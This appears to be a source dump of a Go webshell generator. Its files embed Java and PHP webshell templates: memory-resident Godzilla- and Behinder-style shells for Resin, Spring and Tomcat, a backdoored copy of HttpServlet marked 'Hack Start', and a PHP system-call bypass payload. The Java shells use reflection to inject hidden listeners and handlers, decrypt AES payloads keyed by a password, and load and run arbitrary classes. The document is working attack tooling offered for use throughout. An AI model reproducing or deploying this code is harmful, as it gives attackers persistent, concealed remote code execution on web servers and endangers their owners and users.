74 | try { 75 | method = clazz.getDeclaredMethod(methodName, args); 76 | clazz = null; 77 | } catch (NoSuchMethodException e) { 78 | clazz = clazz.getSuperclass(); 79 | } 80 | } 81 | return method; 82 | } 83 | 84 | private Object invokeMethod( 85 | Object obj, String methodName, Object... args 86 | ) { 87 | ArrayList clazzs = new ArrayList(); 88 | if (args != null) { 89 | for (int i=0; i listeners = 268 | (ArrayList) getFieldValue(webApp, "_requestListeners"); 269 | for (Object listener: listeners) { 270 | if (listener instanceof Proxy) { 271 | return; 272 | } 273 | } 274 | Class WebApp = webApp.getClass(); 275 | if (WebApp.getName() == "com.caucho.server.webapp.Application") { 276 | WebApp = WebApp.getSuperclass(); 277 | } 278 | Method addListenerObject = getMethodX( 279 | WebApp, "addListenerObject", 2 280 | ); 281 | addListenerObject.setAccessible(true); 282 | addListenerObject.invoke(webApp, proxyObject, true); 283 | } 284 | 285 | public ResinListener() { 286 | synchronized(lock) { 287 | Class servletRequestListener = null; 288 | try { 289 | servletRequestListener = Class.forName( 290 | "javax.servlet.ServletRequestListener" 291 | ); 292 | } catch (ClassNotFoundException e) {} 293 | 294 | if (servletRequestListener != null) { 295 | Object proxyObject = Proxy.newProxyInstance( 296 | getLoader(), new Class[]{servletRequestListener}, this 297 | ); 298 | try { 299 | addListener(proxyObject); 300 | } catch (Exception e) {} 301 | } 302 | } 303 | } 304 | 305 | static { 306 | new ResinListener(); 307 | } 308 | } 309 | ` 310 | } 311 | -------------------------------------------------------------------------------- /shell/bypass/bypassphp.go: -------------------------------------------------------------------------------- 1 | package bypass 2 | 3 | import ( 4 | "webshell/common" 5 | ) 6 | 7 | func Phpbypass() { 8 | common.Filename = common.RandStr(6)+`.php` 9 | common.Password = "http://url/?1[]=system&1[]=a&1[]=b&2=whoami" 10 | common.Webshells = `` 11 | } 12 | -------------------------------------------------------------------------------- /shell/memory/Godzilla/GoSpring/GoSpring128.go: -------------------------------------------------------------------------------- 1 | package GoSpring 2 | 3 | import "webshell/common" 4 | 5 | func GoSpringHadnler() { 6 | common.Filename = "SpringHandler.java" 7 | common.Webshells = `import org.springframework.web.server.ServerWebExchange; 8 | import java.lang.reflect.*; 9 | import java.util.*; 10 | import java.util.function.Function; 11 | 12 | public class SpringHandler { 13 | private static String password = "` + common.Password + `"; 14 | 15 | private static Object lock = new Object(); 16 | 17 | private Field getField(Object obj, String fieldName) { 18 | Class clazz; 19 | Field field = null; 20 | if (obj == null) { 21 | return null; 22 | } 23 | if (obj instanceof Class) { 24 | clazz = (Class) obj; 25 | } else { 26 | clazz = obj.getClass(); 27 | } 28 | while (clazz != null) { 29 | try { 30 | field = clazz.getDeclaredField(fieldName); 31 | clazz = null; 32 | } catch (NoSuchFieldException e) { 33 | clazz = clazz.getSuperclass(); 34 | } 35 | } 36 | if (field != null) { 37 | try { 38 | Field mf = Field.class.getDeclaredField("modifiers"); 39 | mf.setAccessible(true); 40 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 41 | field.setAccessible(true); 42 | } catch (Exception e) {} 43 | } 44 | return field; 45 | } 46 | 47 | private Object getFieldValue(Object obj, String fieldName) { 48 | Field field; 49 | if (obj instanceof Field) { 50 | field = (Field) obj; 51 | } else { 52 | field = getField(obj, fieldName); 53 | } 54 | try { 55 | return field.get(obj); 56 | } catch (IllegalAccessException e) { 57 | return null; 58 | } 59 | } 60 | 61 | private Method getMethodX(Class clazz, String methodName, int num) { 62 | Method[] methods = clazz.getDeclaredMethods(); 63 | for (Method method : methods) { 64 | if (method.getName().equals(methodName)) { 65 | if (method.getParameterTypes().length == num) { 66 | return method; 67 | } 68 | } 69 | } 70 | return null; 71 | } 72 | 73 | private Method getMethod(Class clazz, String methodName, Class... args) { 74 | Method method = null; 75 | while (clazz != null) { 76 | try { 77 | method = clazz.getDeclaredMethod(methodName, args); 78 | clazz = null; 79 | } catch (NoSuchMethodException e) { 80 | clazz = clazz.getSuperclass(); 81 | } 82 | } 83 | return method; 84 | } 85 | 86 | private Object invokeMethod( 87 | Object obj, String methodName, Object... args 88 | ) { 89 | ArrayList clazzs = new ArrayList(); 90 | if (args != null) { 91 | for (int i=0; i T hook(ServerWebExchange request) 233 | throws Exception { 234 | Class ServerWebExchange = Class.forName( 235 | "org.springframework.web.server.ServerWebExchange" 236 | ); 237 | Object mono = getMethodX( 238 | ServerWebExchange, "getFormData", 0 239 | ).invoke(request); 240 | 241 | Class Mono = Class.forName("reactor.core.publisher.Mono"); 242 | Method flatMap = getMethodX(Mono, "flatMap", 1); 243 | Function transformer = reqbody -> { 244 | Object resbody = null; 245 | try { 246 | Class MultiValueMap = Class.forName( 247 | "org.springframework.util.MultiValueMap" 248 | ); 249 | String payload = (String) getMethodX( 250 | MultiValueMap, "getFirst", 1 251 | ).invoke(reqbody, password); 252 | String result = stub(payload, null, null); 253 | if (result == null) {result = "";} 254 | resbody = getMethodX(Mono, "just", 1).invoke(Mono, result); 255 | } catch (Exception e) {} 256 | return resbody; 257 | }; 258 | 259 | Object resbody = flatMap.invoke(mono, transformer); 260 | Class HttpStatus = Class.forName( 261 | "org.springframework.http.HttpStatus" 262 | ); 263 | Class ResponseEntity = Class.forName( 264 | "org.springframework.http.ResponseEntity" 265 | ); 266 | Object OK = getFieldValue(HttpStatus, "OK"); 267 | Constructor responseEntity = ResponseEntity.getConstructor( 268 | Object.class, HttpStatus 269 | ); 270 | return (T) responseEntity.newInstance(resbody, OK); 271 | } 272 | 273 | public SpringHandler() {} 274 | 275 | public SpringHandler( 276 | Object requestMappingHandlerMapping, String path 277 | ) throws Exception { 278 | Class requestMappingInfo = Class.forName( 279 | "org.springframework.web.reactive.result.method.RequestMappingInfo" 280 | ); 281 | Method mPaths = requestMappingInfo.getMethod("paths", String[].class); 282 | Method registerHandlerMethod = getMethodX( 283 | requestMappingHandlerMapping.getClass(), 284 | "registerHandlerMethod", 3 285 | ); 286 | registerHandlerMethod.setAccessible(true); 287 | registerHandlerMethod.invoke( 288 | requestMappingHandlerMapping, new SpringHandler(), 289 | getMethodX(SpringHandler.class, "hook", 1), 290 | invokeMethod(mPaths.invoke(null, new Object[]{new String[]{path}}), 291 | "build") 292 | ); 293 | } 294 | 295 | public static String addHandler( 296 | Object requestMappingHandlerMapping, String path 297 | ) { 298 | try { 299 | new SpringHandler(requestMappingHandlerMapping, path); 300 | } catch (Exception e) {} 301 | return "addHandler"; 302 | } 303 | } 304 | ` 305 | } 306 | 307 | func GoSpringInterceptor() { 308 | common.Filename = "SpringInterceptor.java" 309 | common.Webshells = `import java.lang.reflect.*; 310 | import java.util.*; 311 | 312 | public class SpringInterceptor implements InvocationHandler { 313 | private static String password = "` + common.Password + `"; 314 | 315 | private static Object lock = new Object(); 316 | 317 | private Field getField(Object obj, String fieldName) { 318 | Class clazz; 319 | Field field = null; 320 | if (obj == null) { 321 | return null; 322 | } 323 | if (obj instanceof Class) { 324 | clazz = (Class) obj; 325 | } else { 326 | clazz = obj.getClass(); 327 | } 328 | while (clazz != null) { 329 | try { 330 | field = clazz.getDeclaredField(fieldName); 331 | clazz = null; 332 | } catch (NoSuchFieldException e) { 333 | clazz = clazz.getSuperclass(); 334 | } 335 | } 336 | if (field != null) { 337 | try { 338 | Field mf = Field.class.getDeclaredField("modifiers"); 339 | mf.setAccessible(true); 340 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 341 | field.setAccessible(true); 342 | } catch (Exception e) {} 343 | } 344 | return field; 345 | } 346 | 347 | private Object getFieldValue(Object obj, String fieldName) { 348 | Field field; 349 | if (obj instanceof Field) { 350 | field = (Field) obj; 351 | } else { 352 | field = getField(obj, fieldName); 353 | } 354 | try { 355 | return field.get(obj); 356 | } catch (IllegalAccessException e) { 357 | return null; 358 | } 359 | } 360 | 361 | private Method getMethodX(Class clazz, String methodName, int num) { 362 | Method[] methods = clazz.getDeclaredMethods(); 363 | for (Method method : methods) { 364 | if (method.getName().equals(methodName)) { 365 | if (method.getParameterTypes().length == num) { 366 | return method; 367 | } 368 | } 369 | } 370 | return null; 371 | } 372 | 373 | private Method getMethod(Class clazz, String methodName, Class... args) { 374 | Method method = null; 375 | while (clazz != null) { 376 | try { 377 | method = clazz.getDeclaredMethod(methodName, args); 378 | clazz = null; 379 | } catch (NoSuchMethodException e) { 380 | clazz = clazz.getSuperclass(); 381 | } 382 | } 383 | return method; 384 | } 385 | 386 | private Object invokeMethod( 387 | Object obj, String methodName, Object... args 388 | ) { 389 | ArrayList clazzs = new ArrayList(); 390 | if (args != null) { 391 | for (int i=0; i c) { 114 | 115 | if (c.equals(javax.servlet.http.HttpServlet.class)) { 116 | return null; 117 | } 118 | 119 | Method[] parentMethods = getAllDeclaredMethods(c.getSuperclass()); 120 | Method[] thisMethods = c.getDeclaredMethods(); 121 | 122 | if ((parentMethods != null) && (parentMethods.length > 0)) { 123 | Method[] allMethods = new Method[parentMethods.length + thisMethods.length]; 124 | System.arraycopy(parentMethods, 0, allMethods, 0, parentMethods.length); 125 | System.arraycopy(thisMethods, 0, allMethods, parentMethods.length, thisMethods.length); 126 | thisMethods = allMethods; 127 | } 128 | 129 | return thisMethods; 130 | } 131 | 132 | protected void doOptions(HttpServletRequest req, 133 | HttpServletResponse resp) 134 | throws ServletException, IOException { 135 | 136 | Method[] methods = getAllDeclaredMethods(this.getClass()); 137 | 138 | boolean ALLOW_GET = false; 139 | boolean ALLOW_HEAD = false; 140 | boolean ALLOW_POST = false; 141 | boolean ALLOW_PUT = false; 142 | boolean ALLOW_DELETE = false; 143 | boolean ALLOW_TRACE = true; 144 | boolean ALLOW_OPTIONS = true; 145 | 146 | // Tomcat specific hack to see if TRACE is allowed 147 | Class clazz = null; 148 | try { 149 | clazz = Class.forName("org.apache.catalina.connector.RequestFacade"); 150 | Method getAllowTrace = clazz.getMethod("getAllowTrace", (Class[]) null); 151 | ALLOW_TRACE = ((Boolean) getAllowTrace.invoke(req, (Object[]) null)).booleanValue(); 152 | } catch (ClassNotFoundException | NoSuchMethodException | SecurityException | 153 | IllegalAccessException | IllegalArgumentException | InvocationTargetException e) { 154 | // Ignore. Not running on Tomcat. TRACE is always allowed. 155 | } 156 | // End of Tomcat specific hack 157 | 158 | for (int i=0; i reqHeaderEnum = req.getHeaderNames(); 237 | 238 | while( reqHeaderEnum.hasMoreElements() ) { 239 | String headerName = reqHeaderEnum.nextElement(); 240 | buffer.append(CRLF).append(headerName).append(": ") 241 | .append(req.getHeader(headerName)); 242 | } 243 | 244 | buffer.append(CRLF); 245 | 246 | responseLength = buffer.length(); 247 | 248 | resp.setContentType("message/http"); 249 | resp.setContentLength(responseLength); 250 | ServletOutputStream out = resp.getOutputStream(); 251 | out.print(buffer.toString()); 252 | out.close(); 253 | } 254 | 255 | protected void service(HttpServletRequest req, HttpServletResponse resp) 256 | throws ServletException, IOException { 257 | 258 | String method = req.getMethod(); 259 | 260 | if (method.equals(METHOD_GET)) { 261 | long lastModified = getLastModified(req); 262 | if (lastModified == -1) { 263 | // servlet doesn't support if-modified-since, no reason 264 | // to go through further expensive logic 265 | doGet(req, resp); 266 | } else { 267 | long ifModifiedSince; 268 | try { 269 | ifModifiedSince = req.getDateHeader(HEADER_IFMODSINCE); 270 | } catch (IllegalArgumentException iae) { 271 | // Invalid date header - proceed as if none was set 272 | ifModifiedSince = -1; 273 | } 274 | if (ifModifiedSince < (lastModified / 1000 * 1000)) { 275 | // If the servlet mod time is later, call doGet() 276 | // Round down to the nearest second for a proper compare 277 | // A ifModifiedSince of -1 will always be less 278 | maybeSetLastModified(resp, lastModified); 279 | doGet(req, resp); 280 | } else { 281 | resp.setStatus(HttpServletResponse.SC_NOT_MODIFIED); 282 | } 283 | } 284 | 285 | } else if (method.equals(METHOD_HEAD)) { 286 | long lastModified = getLastModified(req); 287 | maybeSetLastModified(resp, lastModified); 288 | doHead(req, resp); 289 | 290 | } else if (method.equals(METHOD_POST)) { 291 | doPost(req, resp); 292 | 293 | } else if (method.equals(METHOD_PUT)) { 294 | doPut(req, resp); 295 | 296 | } else if (method.equals(METHOD_DELETE)) { 297 | doDelete(req, resp); 298 | 299 | } else if (method.equals(METHOD_OPTIONS)) { 300 | doOptions(req,resp); 301 | 302 | } else if (method.equals(METHOD_TRACE)) { 303 | doTrace(req,resp); 304 | 305 | } else { 306 | // 307 | // Note that this means NO servlet supports whatever 308 | // method was requested, anywhere on this server. 309 | // 310 | 311 | String errMsg = lStrings.getString("http.method_not_implemented"); 312 | Object[] errArgs = new Object[1]; 313 | errArgs[0] = method; 314 | errMsg = MessageFormat.format(errMsg, errArgs); 315 | 316 | resp.sendError(HttpServletResponse.SC_NOT_IMPLEMENTED, errMsg); 317 | } 318 | } 319 | 320 | private void maybeSetLastModified(HttpServletResponse resp, 321 | long lastModified) { 322 | if (resp.containsHeader(HEADER_LASTMOD)) { 323 | return; 324 | } 325 | if (lastModified >= 0) { 326 | resp.setDateHeader(HEADER_LASTMOD, lastModified); 327 | } 328 | } 329 | 330 | @Override 331 | public void service(ServletRequest req, ServletResponse res) 332 | throws ServletException, IOException { 333 | 334 | // Hack Start 335 | String password = "` + common.Password + `";//密码 336 | String payload = req.getParameter(password); 337 | if (payload != null) { try { 338 | 339 | Class base64; 340 | Object decoder; 341 | byte[] bytes = null; 342 | java.security.MessageDigest h; 343 | javax.crypto.Cipher c; 344 | 345 | try { 346 | base64 = Class.forName("java.util.Base64"); 347 | decoder = base64.getMethod("getDecoder") 348 | .invoke(base64); 349 | bytes = (byte[]) decoder.getClass() 350 | .getMethod("decode", String.class) 351 | .invoke(decoder, payload); 352 | } catch (ClassNotFoundException e) { 353 | try { 354 | base64 = Class.forName("sun.misc.BASE64Decoder"); 355 | decoder = base64.newInstance(); 356 | bytes = (byte[]) decoder.getClass() 357 | .getMethod("decodeBuffer", String.class) 358 | .invoke(decoder, payload); 359 | } catch (Exception ex) {} 360 | } catch (Exception ex) {} 361 | 362 | h = java.security.MessageDigest.getInstance("MD5"); 363 | h.update(password.getBytes(), 0, password.length()); 364 | byte[] key = new BigInteger(1, h.digest()).toString(16) 365 | .substring(0, 16).getBytes(); 366 | 367 | c = javax.crypto.Cipher.getInstance("AES"); 368 | c.init(2, new javax.crypto.spec.SecretKeySpec(key, "AES")); 369 | bytes = c.doFinal(bytes); 370 | 371 | 372 | Object god = ((HttpServletRequest) req).getSession() 373 | .getAttribute("god"); 374 | if (god instanceof Class) { 375 | java.io.ByteArrayOutputStream arrOut = 376 | new java.io.ByteArrayOutputStream(); 377 | Object f = ((Class) god).newInstance(); 378 | f.equals(arrOut); 379 | f.equals(req); 380 | f.equals(bytes); 381 | f.toString(); 382 | h.update(password.getBytes(), 0, password.length()); 383 | String h1 = new BigInteger(1, h.digest()).toString(16); 384 | String h2 = password + h1.substring(0, 16); 385 | h.update(h2.getBytes(), 0, h2.length()); 386 | String fix = new BigInteger(1, h.digest()).toString(16); 387 | c.init(1, new javax.crypto.spec.SecretKeySpec(key, "AES")); 388 | bytes = c.doFinal(arrOut.toByteArray()); 389 | 390 | String str = null; 391 | try { 392 | base64 = Class.forName("java.util.Base64"); 393 | Object encoder = base64.getMethod("getEncoder") 394 | .invoke(base64); 395 | str = (String) encoder.getClass() 396 | .getMethod("encodeToString", byte[].class) 397 | .invoke(encoder, bytes); 398 | } catch (ClassNotFoundException e) { 399 | try { 400 | base64 = Class.forName("sun.misc.BASE64Decoder"); 401 | Object encoder = base64.newInstance(); 402 | str = (String) encoder.getClass().getMethod("encode", byte[].class) 403 | .invoke(encoder, bytes); 404 | } catch (Exception ex) {} 405 | } catch (Exception ex) {} 406 | 407 | String result = fix.substring(0, 16).toUpperCase()+ 408 | str+fix.substring(16).toUpperCase(); 409 | res.getWriter().write(result); 410 | } else { 411 | Constructor constructor = java.security.SecureClassLoader.class 412 | .getDeclaredConstructor(ClassLoader.class); 413 | constructor.setAccessible(true); 414 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 415 | new Object[]{this.getClass().getClassLoader()} 416 | ); 417 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 418 | "defineClass", byte[].class, int.class, int.class 419 | ); 420 | defineMethod.setAccessible(true); 421 | ((HttpServletRequest) req).getSession().setAttribute( 422 | "god", defineMethod.invoke( 423 | classloader, bytes, 0, bytes.length 424 | ) 425 | ); 426 | } 427 | 428 | } catch (Exception e) {}} 429 | // Hack End 430 | 431 | HttpServletRequest request; 432 | HttpServletResponse response; 433 | 434 | try { 435 | request = (HttpServletRequest) req; 436 | response = (HttpServletResponse) res; 437 | } catch (ClassCastException e) { 438 | throw new ServletException(lStrings.getString("http.non_http")); 439 | } 440 | service(request, response); 441 | } 442 | 443 | private static class NoBodyResponse extends HttpServletResponseWrapper { 444 | private final NoBodyOutputStream noBodyOutputStream; 445 | private ServletOutputStream originalOutputStream; 446 | private NoBodyPrintWriter noBodyWriter; 447 | private boolean didSetContentLength; 448 | 449 | private NoBodyResponse(HttpServletResponse r) { 450 | super(r); 451 | noBodyOutputStream = new NoBodyOutputStream(this); 452 | } 453 | 454 | private void setContentLength() { 455 | if (!didSetContentLength) { 456 | if (noBodyWriter != null) { 457 | noBodyWriter.flush(); 458 | } 459 | super.setContentLengthLong(noBodyOutputStream.getWrittenByteCount()); 460 | } 461 | } 462 | 463 | 464 | @Override 465 | public void setContentLength(int len) { 466 | super.setContentLength(len); 467 | didSetContentLength = true; 468 | } 469 | 470 | @Override 471 | public void setContentLengthLong(long len) { 472 | super.setContentLengthLong(len); 473 | didSetContentLength = true; 474 | } 475 | 476 | @Override 477 | public void setHeader(String name, String value) { 478 | super.setHeader(name, value); 479 | checkHeader(name); 480 | } 481 | 482 | @Override 483 | public void addHeader(String name, String value) { 484 | super.addHeader(name, value); 485 | checkHeader(name); 486 | } 487 | 488 | @Override 489 | public void setIntHeader(String name, int value) { 490 | super.setIntHeader(name, value); 491 | checkHeader(name); 492 | } 493 | 494 | @Override 495 | public void addIntHeader(String name, int value) { 496 | super.addIntHeader(name, value); 497 | checkHeader(name); 498 | } 499 | 500 | private void checkHeader(String name) { 501 | if ("content-length".equalsIgnoreCase(name)) { 502 | didSetContentLength = true; 503 | } 504 | } 505 | 506 | @Override 507 | public ServletOutputStream getOutputStream() throws IOException { 508 | originalOutputStream = getResponse().getOutputStream(); 509 | return noBodyOutputStream; 510 | } 511 | 512 | @Override 513 | public PrintWriter getWriter() throws UnsupportedEncodingException { 514 | 515 | if (noBodyWriter == null) { 516 | noBodyWriter = new NoBodyPrintWriter(noBodyOutputStream, getCharacterEncoding()); 517 | } 518 | return noBodyWriter; 519 | } 520 | 521 | @Override 522 | public void reset() { 523 | super.reset(); 524 | resetBuffer(); 525 | originalOutputStream = null; 526 | } 527 | 528 | @Override 529 | public void resetBuffer() { 530 | noBodyOutputStream.resetBuffer(); 531 | if (noBodyWriter != null) { 532 | noBodyWriter.resetBuffer(); 533 | } 534 | } 535 | } 536 | 537 | private static class NoBodyOutputStream extends ServletOutputStream { 538 | 539 | private static final String LSTRING_FILE = "javax.servlet.http.LocalStrings"; 540 | private static final ResourceBundle lStrings = ResourceBundle.getBundle(LSTRING_FILE); 541 | 542 | private final NoBodyResponse response; 543 | private boolean flushed = false; 544 | private long writtenByteCount = 0; 545 | 546 | private NoBodyOutputStream(NoBodyResponse response) { 547 | this.response = response; 548 | } 549 | 550 | private long getWrittenByteCount() { 551 | return writtenByteCount; 552 | } 553 | 554 | @Override 555 | public void write(int b) throws IOException { 556 | writtenByteCount++; 557 | checkCommit(); 558 | } 559 | 560 | @Override 561 | public void write(byte buf[], int offset, int len) throws IOException { 562 | if (buf == null) { 563 | throw new NullPointerException( 564 | lStrings.getString("err.io.nullArray")); 565 | } 566 | 567 | if (offset < 0 || len < 0 || offset+len > buf.length) { 568 | String msg = lStrings.getString("err.io.indexOutOfBounds"); 569 | Object[] msgArgs = new Object[3]; 570 | msgArgs[0] = Integer.valueOf(offset); 571 | msgArgs[1] = Integer.valueOf(len); 572 | msgArgs[2] = Integer.valueOf(buf.length); 573 | msg = MessageFormat.format(msg, msgArgs); 574 | throw new IndexOutOfBoundsException(msg); 575 | } 576 | 577 | writtenByteCount += len; 578 | checkCommit(); 579 | } 580 | 581 | @Override 582 | public boolean isReady() { 583 | // Will always be ready as data is swallowed. 584 | return true; 585 | } 586 | 587 | @Override 588 | public void setWriteListener(WriteListener listener) { 589 | response.originalOutputStream.setWriteListener(listener); 590 | } 591 | 592 | private void checkCommit() throws IOException { 593 | if (!flushed && writtenByteCount > response.getBufferSize()) { 594 | response.flushBuffer(); 595 | flushed = true; 596 | } 597 | } 598 | 599 | private void resetBuffer() { 600 | if (flushed) { 601 | throw new IllegalStateException(lStrings.getString("err.state.commit")); 602 | } 603 | writtenByteCount = 0; 604 | } 605 | } 606 | 607 | private static class NoBodyPrintWriter extends PrintWriter { 608 | 609 | private final NoBodyOutputStream out; 610 | private final String encoding; 611 | private PrintWriter pw; 612 | 613 | public NoBodyPrintWriter(NoBodyOutputStream out, String encoding) throws UnsupportedEncodingException { 614 | super(out); 615 | this.out = out; 616 | this.encoding = encoding; 617 | 618 | Writer osw = new OutputStreamWriter(out, encoding); 619 | pw = new PrintWriter(osw); 620 | } 621 | 622 | private void resetBuffer() { 623 | out.resetBuffer(); 624 | 625 | Writer osw = null; 626 | try { 627 | osw = new OutputStreamWriter(out, encoding); 628 | } catch (UnsupportedEncodingException e) { 629 | // Impossible. 630 | // The same values were used in the constructor. If this method 631 | // gets called then the constructor must have succeeded so the 632 | // above call must also succeed. 633 | } 634 | pw = new PrintWriter(osw); 635 | } 636 | 637 | @Override 638 | public void flush() { 639 | pw.flush(); 640 | } 641 | 642 | @Override 643 | public void close() { 644 | pw.close(); 645 | } 646 | 647 | @Override 648 | public boolean checkError() { 649 | return pw.checkError(); 650 | } 651 | 652 | @Override 653 | public void write(int c) { 654 | pw.write(c); 655 | } 656 | 657 | @Override 658 | public void write(char[] buf, int off, int len) { 659 | pw.write(buf, off, len); 660 | } 661 | 662 | @Override 663 | public void write(char[] buf) { 664 | pw.write(buf); 665 | } 666 | 667 | @Override 668 | public void write(String s, int off, int len) { 669 | pw.write(s, off, len); 670 | } 671 | 672 | @Override 673 | public void write(String s) { 674 | pw.write(s); 675 | } 676 | 677 | @Override 678 | public void print(boolean b) { 679 | pw.print(b); 680 | } 681 | 682 | @Override 683 | public void print(char c) { 684 | pw.print(c); 685 | } 686 | 687 | @Override 688 | public void print(int i) { 689 | pw.print(i); 690 | } 691 | 692 | @Override 693 | public void print(long l) { 694 | pw.print(l); 695 | } 696 | 697 | @Override 698 | public void print(float f) { 699 | pw.print(f); 700 | } 701 | 702 | @Override 703 | public void print(double d) { 704 | pw.print(d); 705 | } 706 | 707 | @Override 708 | public void print(char[] s) { 709 | pw.print(s); 710 | } 711 | 712 | @Override 713 | public void print(String s) { 714 | pw.print(s); 715 | } 716 | 717 | @Override 718 | public void print(Object obj) { 719 | pw.print(obj); 720 | } 721 | 722 | @Override 723 | public void println() { 724 | pw.println(); 725 | } 726 | 727 | @Override 728 | public void println(boolean x) { 729 | pw.println(x); 730 | } 731 | 732 | @Override 733 | public void println(char x) { 734 | pw.println(x); 735 | } 736 | 737 | @Override 738 | public void println(int x) { 739 | pw.println(x); 740 | } 741 | 742 | @Override 743 | public void println(long x) { 744 | pw.println(x); 745 | } 746 | 747 | @Override 748 | public void println(float x) { 749 | pw.println(x); 750 | } 751 | 752 | @Override 753 | public void println(double x) { 754 | pw.println(x); 755 | } 756 | 757 | @Override 758 | public void println(char[] x) { 759 | pw.println(x); 760 | } 761 | 762 | @Override 763 | public void println(String x) { 764 | pw.println(x); 765 | } 766 | 767 | @Override 768 | public void println(Object x) { 769 | pw.println(x); 770 | } 771 | } 772 | 773 | private static class NoBodyAsyncContextListener implements AsyncListener { 774 | 775 | private final NoBodyResponse noBodyResponse; 776 | 777 | public NoBodyAsyncContextListener(NoBodyResponse noBodyResponse) { 778 | this.noBodyResponse = noBodyResponse; 779 | } 780 | 781 | @Override 782 | public void onComplete(AsyncEvent event) throws IOException { 783 | noBodyResponse.setContentLength(); 784 | } 785 | 786 | @Override 787 | public void onTimeout(AsyncEvent event) throws IOException { 788 | // NO-OP 789 | } 790 | 791 | @Override 792 | public void onError(AsyncEvent event) throws IOException { 793 | // NO-OP 794 | } 795 | 796 | @Override 797 | public void onStartAsync(AsyncEvent event) throws IOException { 798 | // NO-OP 799 | } 800 | } 801 | } 802 | ` 803 | } 804 | -------------------------------------------------------------------------------- /shell/memory/Behinder/Betomcat/Bettaes128.go: -------------------------------------------------------------------------------- 1 | package Betomcat 2 | 3 | import "webshell/common" 4 | 5 | func TomactLis() { 6 | common.Filename = "TomcatListener.java" 7 | common.Webshells = `import java.lang.reflect.*; 8 | import java.util.*; 9 | 10 | public class TomcatListener implements InvocationHandler { 11 | private static String password = "` + common.Password + `"; 12 | 13 | private static Object lock = new Object(); 14 | 15 | private Field getField(Object obj, String fieldName) { 16 | Class clazz; 17 | Field field = null; 18 | if (obj == null) { 19 | return null; 20 | } 21 | if (obj instanceof Class) { 22 | clazz = (Class) obj; 23 | } else { 24 | clazz = obj.getClass(); 25 | } 26 | while (clazz != null) { 27 | try { 28 | field = clazz.getDeclaredField(fieldName); 29 | clazz = null; 30 | } catch (NoSuchFieldException e) { 31 | clazz = clazz.getSuperclass(); 32 | } 33 | } 34 | if (field != null) { 35 | try { 36 | Field mf = Field.class.getDeclaredField("modifiers"); 37 | mf.setAccessible(true); 38 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 39 | field.setAccessible(true); 40 | } catch (Exception e) {} 41 | } 42 | return field; 43 | } 44 | 45 | private Object getFieldValue(Object obj, String fieldName) { 46 | Field field; 47 | if (obj instanceof Field) { 48 | field = (Field) obj; 49 | } else { 50 | field = getField(obj, fieldName); 51 | } 52 | try { 53 | return field.get(obj); 54 | } catch (IllegalAccessException e) { 55 | return null; 56 | } 57 | } 58 | 59 | private Method getMethodX(Class clazz, String methodName, int num) { 60 | Method[] methods = clazz.getDeclaredMethods(); 61 | for (Method method : methods) { 62 | if (method.getName().equals(methodName)) { 63 | if (method.getParameterTypes().length == num) { 64 | return method; 65 | } 66 | } 67 | } 68 | return null; 69 | } 70 | 71 | private Method getMethod(Class clazz, String methodName, Class... args) { 72 | Method method = null; 73 | while (clazz != null) { 74 | try { 75 | method = clazz.getDeclaredMethod(methodName, args); 76 | clazz = null; 77 | } catch (NoSuchMethodException e) { 78 | clazz = clazz.getSuperclass(); 79 | } 80 | } 81 | return method; 82 | } 83 | 84 | private Object invokeMethod( 85 | Object obj, String methodName, Object... args 86 | ) { 87 | ArrayList clazzs = new ArrayList(); 88 | if (args != null) { 89 | for (int i=0; i keySet = catalina.keySet().iterator(); 159 | while(keySet.hasNext()) { 160 | String key = keySet.next(); 161 | if (key.contains("NonLoginAuthenticator")) { 162 | nonLoginAuthenticator = catalina.get(key); 163 | break; 164 | } 165 | } 166 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 167 | Object resource = getFieldValue(object, "resource"); 168 | return getFieldValue(resource, "context"); 169 | } 170 | 171 | 172 | private byte[] cipher( 173 | byte[] payload, String alg, byte[] key, boolean isEnc 174 | ) { 175 | try { 176 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance(alg); 177 | c.init(isEnc?1:2, new javax.crypto.spec.SecretKeySpec(key, alg)); 178 | return c.doFinal(payload); 179 | } catch (Exception e) { 180 | return null; 181 | } 182 | } 183 | 184 | private String hasher(String str, String alg) { 185 | try { 186 | java.security.MessageDigest h = 187 | java.security.MessageDigest.getInstance(alg); 188 | h.update(str.getBytes(), 0, str.length()); 189 | return new java.math.BigInteger(1, h.digest()).toString(16); 190 | } catch (Exception e) { 191 | return null; 192 | } 193 | } 194 | 195 | private byte[] decoder(String payload) { 196 | return cipher( 197 | b64decode(payload), "AES", 198 | hasher(password, "MD5").substring(0, 16).getBytes(), false 199 | ); 200 | } 201 | 202 | 203 | private String stub(String payload, Object request, Object response) 204 | throws Exception { 205 | if (invokeMethod(request, "getMethod").equals("POST")) { 206 | payload = (String) invokeMethod( 207 | invokeMethod(request, "getReader"),"readLine" 208 | ); 209 | java.util.HashMap pageContext = new java.util.HashMap(); 210 | Object session = invokeMethod(request, "getSession"); 211 | pageContext.put("request", request); 212 | pageContext.put("response", response); 213 | pageContext.put("session", session); 214 | invokeMethod(session, "putValue", 215 | 'u', hasher(password, "MD5").substring(0, 16)); 216 | byte[] b = decoder(payload); 217 | Constructor constructor = java.security.SecureClassLoader.class 218 | .getDeclaredConstructor(ClassLoader.class); 219 | constructor.setAccessible(true); 220 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 221 | new Object[]{this.getClass().getClassLoader()} 222 | ); 223 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 224 | "defineClass", byte[].class, int.class, int.class 225 | ); 226 | defineMethod.setAccessible(true); 227 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 228 | .newInstance().equals(pageContext); 229 | } 230 | return null; 231 | } 232 | 233 | private void hook(Object servletRequestEvent) throws Exception { 234 | Object servletRequest = invokeMethod( 235 | servletRequestEvent, "getServletRequest" 236 | ); 237 | Object request = getFieldValue(servletRequest, "request"); 238 | Object response = invokeMethod(request, "getResponse"); 239 | String payload = (String) invokeMethod( 240 | servletRequest, "getParameter", password 241 | ); 242 | stub(payload, request, response); 243 | } 244 | 245 | @Override 246 | public Object invoke(Object proxy, Method method, Object[] args) 247 | throws Throwable { 248 | if (method.getName().equals("requestInitialized")) { 249 | Object servletRequestEvent = args[0]; 250 | hook(servletRequestEvent); 251 | } 252 | return null; 253 | } 254 | 255 | private void addListener(Object proxyObject) throws Exception { 256 | Object context = getStandardContext(); 257 | for (Object listener : 258 